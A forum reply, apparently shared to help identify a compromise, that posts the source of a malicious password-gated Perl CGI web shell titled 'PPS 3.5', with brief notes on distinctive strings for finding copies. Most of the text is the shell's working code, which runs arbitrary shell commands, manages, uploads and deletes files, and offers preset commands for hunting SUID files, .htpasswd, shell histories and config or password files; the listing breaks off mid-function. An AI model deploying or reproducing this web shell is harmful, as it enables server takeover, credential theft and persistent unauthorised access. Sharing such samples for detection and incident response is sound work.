http://qs321.pair.com?node_id=1232510


in reply to Re: Malicious Perl Scripts & Web Development
in thread Malicious Perl Scripts & Web Development

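Here is the malicious script. It is a password-gated Perl CGI web shell (its page title is "PPS 3.5") whose menu lists Sysinfo, Files, Console, SQL, Network and Code pages. The "+" characters scattered through the listing are this site's line-wrap markers, not part of the code. When hunting for other copies on a server, the hard-coded `$Password` MD5 value, the `SAVEDPWD` and `last_command` cookie names, and the "PPS 3.5" title are the most distinctive strings to search for.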

#!/usr/bin/perl use strict; undef $modules::Module::var; my ($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$dive +,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Re +director,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$Hea +derBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suff +ixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$H +tmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPasswo +rd,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand +,$RunCommand1,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$ +downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFi +le,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$z +apros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde +,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetNa +me,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$ +Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd):shared; $Password="4c20bd58199372d362ad27c9e2fddef7"; $CommandTimeoutDuration=1000; $tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size +=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive +='</pre></div>';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$U +nixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmd +Sep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirect +or=($WinNT?" 
2>&1 1>&2":" 1>&1 2>&1");use File::Basename;use MIME::Ba +se64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack( +"H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $ur +l1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ i +f @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; +boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_S +TRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $M +ultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if( +$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Bounda +ry='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderB +ody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'fileda +ta'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list +[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$v +al=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c +",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach my $i( +0 .. 
$#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s +/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$k +ey}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="una +me -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|se +d 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if +($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} + {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub h +ddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"'; +$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfre +e();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s +.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0 +]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){retur +n "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];} +}sub dlink($){if(-l $_[0]){return '->'.readlink $_[0]}}sub dir_list{m +y @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir +($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse +($arg,@suffixlist);if(-d $arg){print '<tr class='.($id%2==0?"l1":"l2" +).'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td +><form method=POST name='.$ii.'><input type=hidden name=a value=comma +nd><input type=hidden name=d value='.$CurrentDir.'><input type=hidden + name=c value="'.dir_read($arg).'"><a href="javascript:document.'.$ii +.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.dlink($ +arg).' 
]</b></font></a></form></td><td>dir</td><td>'.mt1((stat($arg)) +[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method +="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input +type="hidden" name="a" value="RT"><input type="hidden" name="fdata" v +alue='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" + value='.perm($arg).'><input type="hidden" name="f" value='.$name.'>< +a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td>< +td><form method=POST name='.$ii.'z><input type=hidden name=zip value= +'.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type +=hidden name=a value=command><input type=hidden name=d value='.$Curre +ntDir.'><input type=hidden name=c value=zip><a href="javascript:docum +ent.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST nam +e='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input + type=hidden name=a value=command><input type=hidden name=d value='.$ +CurrentDir.'><input type=hidden name=c value=unzip><a href="javascrip +t:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form metho +d=POST name='.$ii.'del><input type=hidden name=del_dir value='.$name. +'><input type=hidden name=a value=command><input type=hidden name=d v +alue='.$CurrentDir.'><input type=hidden name=c value=deldir><a href=" +javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font +>]</a></form></td></table/></td></tr>';}else{$size1=(stat $arg)[7]/10 +24;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=s +printf("%.2f",($size1/1024))." MB";}print '<tr class='.($id%2==0?"l1" +:"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></t +h><td><form name='.$ii.' 
method=post><input type=hidden name=path id= +view value='.$name.'><input type=hidden name=a value=view_file><input + type=hidden name=d value='.$CurrentDir.'><a href="javascript:documen +t.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.dlink +($arg).'</font></a></form></td><td>'.$size.'</td><td>'.mt1((stat($arg +))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt meth +od="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><inpu +t type="hidden" name="a" value="RT"><input type="hidden" name="fdata" + value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmo +d" value='.perm($arg).'><input type="hidden" name="f" value='.$name.' +><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td +><td><form name='.$ii.'ed method=post><input type=hidden name=path id +=edit1_file value='.$name.'><input type=hidden name=a value=edit_file +_path><input type=hidden name=d value='.$CurrentDir.'><a href="javasc +ript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='. 
+$ii.'d method="POST"><input type="hidden" name="d" value="'.$CurrentD +ir.'"><input type="hidden" name="a" value="download"><input type="hid +den" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.s +ubmit()">D </a></form></td><td><form method=POST name='.$ii.'z><input + type=hidden name=zip value='.$name.'><input type=hidden name=arh_nam +e value='.$ii.'z><input type=hidden name=a value=command><input type= +hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=z +ip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></ +td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip +_name value='.$name.'><input type=hidden name=a value=command><input +type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c va +lue=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a +></form></td><td><form method=POST name='.$ii.'del><input type=hidden + name=del_file value='.$name.'><input type=hidden name=a value=comman +d><input type=hidden name=d value='.$CurrentDir.'><input type=hidden +name=c value=delfile><a href="javascript:document.'.$ii.'del.submit() +">[<font color=#FF0000>x</font>]</a></form></td>'.$tabe.'</td></tr>'} +}print $tabe;sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&0 +7777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(ge +tpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0 +];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);my $suid=substr $ +mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if( +!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#F +FD700>'.$suid.'</font></b><font color=#FF0000>'.$last.'</font></td>'; +}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font c +olor=#FFD700>'.$suid.'</font></b><font color=#FFFFFF>'.$last.'</font> +</td>';}else{return '<td>'.$user.'/'.$group.'</td><td><b><font color= +#FFD700>'.$suid.'</font></b><font color=#25ff00>'.$last.'</font></td> 
+';}}else{if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font + color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>' +.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td> +';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00> +'.$mode.'</font></td>';}}}sub mt{my($seconds,$minutes,$hours,$day,$mo +nth,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-' +.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02 +d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds); +return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$y +ear,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'. +sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d +",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);r +eturn $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my +@list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $fil +e ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}fo +r $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @ +files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChar +s($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSp +ecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g;return $st;} $uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print +"Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVED +PWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentD +ir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H +*",$1)/eg;print <<END; <html><head><title>PPS 3.5</title>$HtmlMetaHeader<style>body{backgroun +d-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-dec +oration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-a +lign:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;} +span,h1,a{color: #df5 !important;}span{font-weight: 
bolder;}h1{border +-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-c +olor:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;backgr +ound-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration: +none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;fo +nt:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;ove +rflow:auto;}.bigarea{width:100%;height:250px;}input,textarea,select{m +argin:0;color:#fff;background-color:#555;border:1px solid #df5;font: +9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:ce +nter;}.toolsInp{width: 300px}.toolsInp1{border: none}.main th{text-al +ign:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5 +e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-fa +mily:Courier,Monospace;}</style></head><body onLoad="changeText();doc +ument.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin +="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 + cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hd +d:<br>DateTime:<br>Pwd:</span></td><td><nobr> END P(`$uname`);print "</nobr><br>";P(`$idd`);print "<br>";PH(`$hddall`);p +rint " GB <span>Free: </span>";PH(`$hddfree`);print " GB [ ";P(`$hddp +roc`);print "% ]";$time=mt();print "<br>$time$tab <td>";my $cwd="";my + @path=split("/",$CurrentDir);my $mode=sprintf("%04o",((stat($Current +Dir))[2])&07777);my $ss=0;print '<table cellpadding=0 cellspacing=0>< +td><form method=POST name=cwd0><a href="javascript:document.cwd0.subm +it()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type= +hidden name=a value=command><input type=hidden name=d value='.$Curren +tDir.'><input type=hidden name=c value="changedir"></form></td>';fore +ach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form meth +od=POST name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submi +t()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input typ +e=hidden 
name=a value=command><input type=hidden name=d value='.$Curr +entDir.'><input type=hidden name=c value="changedir"></form></td>';}} +my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";pr +int $tabe;sub cwdcol{if(!-r $CurrentDir){return '<font color=#FF0000> +'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF +>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font> +';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] + </a></td></td>$tabe";print <<END; </td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SE +RVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr>< +/td></tr>$tabe<table width=100% bgcolor=#444><td><form method="POST" +name=systeminfo><input type="hidden" name="a" value="systeminfo"><inp +ut type=hidden name=d value=$CurrentDir><a href="javascript:document. +systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td>< +form method=POST name=files><input type=hidden name=cc value=$Current +Dir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw +] $fe</a><input type=hidden name=a value=command><input type=hidden n +ame=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentD +ir"></form></td><td><form method="POST" name=consoler><input type="hi +dden" name="a" value="console"><input type="hidden" name="d" value=$C +urrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe +Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman> +<input type=hidden name=d value=$CurrentDir><input type="hidden" name +="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ +$fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backcon +n><input type=hidden name=d value=$CurrentDir><input type="hidden" na +me="a" value="net"><a href="javascript:document.backconn.submit()">$f +w [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name +=evalc><input type=hidden name=d value=$CurrentDir><input 
type="hidde +n" name="a" value="code"><a href="javascript:document.evalc.submit()" +>$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name +=logout><input type="hidden" name="a" value="logout"><a href="javascr +ipt:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></ +td><td><form method="POST" name=remove><input type="hidden" name="a" +value="remove"><a href="javascript:document.remove.submit()">$fw [ $f +e Self remove $fw ] $fe</a></form></td>$tabe</tr>$tabe<font color="#C +0C0C0" size="2"> END }sub PrintLoginForm{print "<center><form name=f method=POST><input typ +e=password name=p><input type=submit value='>>'></form></center>";}su +b PrintPageFooter{print "</font></body></html>";}sub GetCookies{@http +cookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies) +{($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout +{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print +"Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md +5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5 +_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&Print +CommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text +/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");fi +le_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCom +mandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName +$CurrentDir]\$ ";dir_list();print "<tr><form method=post><input type= +hidden name=a value=command><input type=hidden name=d value=$CurrentD +ir><select name=group><option value=delete>Delete</option><option val +ue=tar>Compress [tar.gz]</option><option value=untar>Uncompress [tar. 
+gz]</option></select><input type=submit value='>>' onclick='validate( +)'></tr></form>$dive";sub wr_cur {if(!-w $CurrentDir){print '<font co +lor=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[ +Writeable]</font>';}}sub PrintVar{print <<END; <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% +style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr>< +td><form method=POST><span>Change dir:</span><br><input class=toolsIn +p type=text name=cc value=$CurrentDir><input type=submit value='>>'>< +input type=hidden name=a value=command><input type=hidden name=d valu +e=$CurrentDir><input type=hidden name=c value="changedir"></form></td +><td><form method=POST><span>Read file:</span><br><input class='tools +Inp' type=text name=path><input type=hidden name=a value=view_file><i +nput type=hidden name=d value=$CurrentDir><input type=submit value='> +>'></form></td></tr><tr><td><form method=POST><span>Make dir:</span> END wr_cur();print <<END; <br><input class='toolsInp' type=text name=md><input type=hidden name= +a value=command><input type=hidden name=d value=$CurrentDir><input ty +pe=hidden name=c value="makedir"><input type=submit value='>>'></form +></td><td><form method=POST><span>Make file:</span> END wr_cur();print <<END; <br><input class='toolsInp' type=text name=mf><input type=hidden name= +a value=command><input type=hidden name=d value=$CurrentDir><input ty +pe=hidden name=c value="makefile"><input type=submit value='>>'></for +m></td></tr><tr><td><form name="ff" method="POST"><span>Execute:</spa +n><br><input type="hidden" name="a" value="command"><input type="hidd +en" name="d" value="$CurrentDir"><input class='toolsInp' type=text na +me=c value=''><input type=submit value='>>'></form></td> <td> END &PrintFileUploadForm;print <<END; </td>$tabe END }sub PrintFileUploadForm{print <<END; <span>Upload file: </span> END wr_cur();print <<END; <br><form name="upload_file_form" enctype="multipart/form-data" method 
+="POST"><input type="file" name="f" class=toolsInp><input type="submi +t" value=">>"><input type="hidden" name="d" value="$CurrentDir"><inpu +t type="hidden" name="a" value="upload"></form><script>function setCo +okie(name,value,expires,path,domain,secure){document.cookie=name+"="+ +escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+pat +h:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}functi +on validate(form){var namelist='';var names=document.getElementsByNam +e('lo'); var lo=document.getElementsByName('zip');for(var i=0;i<name +s.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCoo +kie("f",namelist,"","/");}function sall(form){var namelist='';var ch= +true;var names=document.getElementsByName('lo');var ss=document.getEl +ementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(va +r i=0;i<names.length;i++){names[i].checked=ch;}}</script> END }&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("%02lx", ord +$1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr +(hex $1)/eg;return $str;}sub ConsoleP{print <<END; <tr><td><form name="run" method="POST"><br><input type=text size="2" i +d="sub3" disabled value='\$ '><input type="hidden" name="a" value="co +mmand1"><input type="hidden" name="d" value="$CurrentDir"><input type +=text name="c" size=100 class=toolsInp1 id='lsname' onkeypress="s(eve +nt)" value=''><input type=submit class=toolsInp1 id="sub4" value=''>< +/form></td></tr>$tab<td><form name="alias" method="POST"><br><input t +ype="hidden" name="a" value="command1"><input type="hidden" name="d" +value="$CurrentDir"><select name=aliases id='nnname' class=toolsInp>< +option value="ls -lha">List dir</option><option value="lsattr -va">li +st file attributes on a Linux second extended file system</option><op +tion value="netstat -an | grep -i listen">show opened ports</option>< +option value="ps aux">process status</option><optgroup label="-Find-" +></optgroup><option value="find / -type 
f -perm -04000 -ls">find all +suid files</option><option value="find . -type f -perm -04000 -ls">fi +nd suid files in current dir</option><option value="find / -type f -p +erm -02000 -ls">find all sgid files</option><option value="find . -ty +pe f -perm -02000 -ls">find sgid files in current dir</option><option + value="find / -type f -name config.inc.php">find config.inc.php file +s</option><option value="find / -type f -name &quot;config*&quot;">fi +nd config* files</option><option value="find . -type f -name &quot;co +nfig*&quot;">find config* files in current dir</option><option value= +"find / -perm -2 -ls">find all writable folders and files</option><op +tion value="find . -perm -2 -ls">find all writable folders and files +in current dir</option><option value="find / -type f -name service.pw +d">find all service.pwd files</option><option value="find . -type f - +name service.pwd">find service.pwd files in current dir</option><opti +on value="find / -type f -name .htpasswd">find all .htpasswd files</o +ption><option value="find . -type f -name .htpasswd">find .htpasswd f +iles in current dir</option><option value="find / -type f -name .bash +_history">find all .bash_history files</option><option value="find . +-type f -name .bash_history">find .bash_history files in current dir< +/option><option value="find / -type f -name .fetchmailrc">find all .f +etchmailrc files</option><option value="find . -type f -name .fetchma +ilrc">find .fetchmailrc files in current dir</option><optgroup label= +"-Locate-"></optgroup><option value="locate httpd.conf">locate httpd. +conf files</option><option value="locate vhosts.conf">locate vhosts.c +onf files</option><option value="locate proftpd.conf">locate proftpd. 
+conf files</option><option value="locate psybnc.conf">locate psybnc.c +onf files</option><option value="locate my.conf">locate my.conf files +</option><option value="locate admin.php">locate admin.php files</opt +ion><option value="locate cfg.php">locate cfg.php files</option><opti +on value="locate conf.php">locate conf.php files</option><option valu +e="locate config.dat">locate config.dat files</option><option value=" +locate config.php">locate config.php files</option><option value="loc +ate config.inc">locate config.inc files</option><option value="locate + config.inc.php">locate config.inc.php</option><option value="locate +config.default.php">locate config.default.php files</option><option v +alue="locate config">locate config* files </option><option value="loc +ate '.conf'">locate .conf files</option><option value="locate '.pwd'" +>locate .pwd files</option><option value="locate '.sql'">locate .sql +files</option><option value="locate '.htpasswd'">locate .htpasswd fil +es</option><option value="locate '.bash_history'">locate .bash_histor +y files</option><option value="locate '.mysql_history'">locate .mysql +_history files</option><option value="locate '.fetchmailrc'">locate . 
+fetchmailrc files</option><option value="locate backup">locate backup + files</option><option value="locate dump">locate dump files</option> +<option value="locate priv">locate priv files</option></select><input + type=submit id="sub2" value='>>'></form></td><td><form name="l11" me +thod="POST"><br><input type="hidden" name="a" value="command1"><input + type="hidden" name="d" value="$CurrentDir"><select name=l11 id='l11' + class=toolsInp> END print "<option value=".$last[-1].">".$last[-1]."</option>";foreach $ar +g(@last){print "<option value=\"$arg\">$arg</option>";}print <<END; </select><input type=submit id="sub5" value='>>'></form></td>$tabe<scr +ipt>document.getElementById('sub3').style.borderColor='#444';document +.getElementById('sub2').style.borderColor='#333';document.getElementB +yId('lsname').style.borderColor='#333';document.getElementById('nnnam +e').style.borderColor='#333';document.getElementById('sub4').style.bo +rderColor='#333';document.getElementById("lsname").style.backgroundCo +lor='#333';document.getElementById("l11").style.backgroundColor='#444 +4';document.getElementById("sub5").style.backgroundColor='#444';docum +ent.getElementById('l11').style.borderColor='#444';document.getElemen +tById('sub5').style.borderColor='#444';document.getElementById("sub3" +).style.backgroundColor='#333';document.getElementById("sub3").style. 
+borderColor='#333';document.getElementById("sub4").style.backgroundCo +lor='#333';document.getElementById('lsname').focus(); function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.ke +yCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selec +tedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x ++1].text;document.getElementById("lsname").value=t;document.getElemen +tById("l11").selectedIndex=document.getElementById("l11").selectedInd +ex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value +=t;document.getElementById("l11").selectedIndex=document.getElementBy +Id("l11").selectedIndex-1;}}</script>$dive END &PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if( +!-w $_[0]){$wr='<font color=#FF0000> Not writable</font>'}else{$wr=' +<font color=#25ff00> Writeable</font>'}my $time=mt1((stat($_[0]))[8] +);sub ffs{return '<font color=#df5>'}sub ffe{return '</font>'}$ffs=ff +s();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1<1000){$size=spri +ntf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024)). 
+" MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9 +]);print "<div class=content>$tab<td><b>$ffs Name: $ffe</b>$TransferF +ile</td><td><b>$ffs Size: $ffe</b>$size</td><td><b>$ffs Permission: $ +ffe</b>$owner</td><td><b>$ffs Access time: $ffe</b>$time</td>$tabe$ta +b<td><b>$ffs Create time: $ffe</b>$ctime</td><td><b>$ffs Modify time: + $ffe</b>$motime</td><td>$wr$tabe</td><table id=toolsTbl cellpadding= +0 cellspacing=0 width=100% style='border-top:2px solid #333;border-b +ottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3><tr><td +><form name=run method=POST><input type=hidden name=a value=command>< +input type=hidden name=d value=$CurrentDir><input type=hidden name=c +value=rename_file><input type=hidden name=path value=".$_[0]."><input + type=text size=20 name=rename_file value=$TransferFile><input type=s +ubmit value=RENAME></form></td><td><form name=run method=POST><input +type=hidden name=a value=command><input type=hidden name=d value=$Cur +rentDir><input type=hidden name=c value=touch_file><input type=hidden + name=path value=".$_[0]."><input type=text size=20 name=touch_file v +alue='$motime'><input type=submit value=TOUCH></form></td><td><form n +ame=run method=POST><input type=hidden name=a value=command><input ty +pe=hidden name=d value=$CurrentDir><input type=text size=20 name=chmo +d value=$Fchmod><input type=hidden name=path value=".$_[0]."><input t +ype=hidden name=c value=chmod_file><input type=submit value=CHMOD></f +orm></td><td><form name=run method=POST><input type=hidden name=a val +ue=download><input type=hidden name=f value=$TransferFile><input type +=hidden name=d value=$CurrentDir><input type=hidden name=path value=$ +TransferFile><input type=submit value=DOWNLOAD></form></td><td><form +name=run method=POST><input type=hidden name=a value=view_file><input + type=hidden name=d value=$CurrentDir><input type=hidden name=path va +lue=$TransferFile><input type=submit value=VIEW></form></td><td><form + name=run 
method=POST><input type=hidden name=a value=edit_file_path> +<input type=hidden name=d value=$CurrentDir><input type=hidden name=p +ath value=$TransferFile><input type=submit value=EDIT></form></td>$ta +be</td>$tabe</div>";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$Curr +entDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "<h +1>File operations:</h1>";my $path=$CurrentDir."/".$TransferFile;ft($p +ath);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print " +<h1>Console:</h1>";print "$div<font style=\"font:9pt Monospace,'Couri +er New';\">";$Prompt="[$ServerName $CurrentDir]";print "$Prompt</font +>";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm( +0);print "</xmp>Command exceeded maximum time of$CommandTimeoutDurati +on second(s).<br>Killed it!";ConsoleP();exit;}}sub file_header{print +"<h1>File manager</h1>$div<table width=100% class=main cellspacing=0 +cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx n +ame=ch11 onclick='sall()'></th><th>&nbsp;Name</th><th>Size</th><th>Mo +dify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr +>";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=leng +th $h;$h=ha $h;if($x<3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand +."ussr"}@last=split(/ussr/,$h);$h=ah $h;print <<END; <script>function setCookie(name,value,expires,path,domain,secure){docu +ment.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"") ++((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)? +";secure":"");}setCookie("last_command","$h","","/");</script> END }sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/gis){$CurrentDi +r=~s!\Q//!/!g;if(!-r $1){$RunCommand="Can't read $1!";chop($CurrentDi +r=`$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"". +$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPa +geHeader("c");print 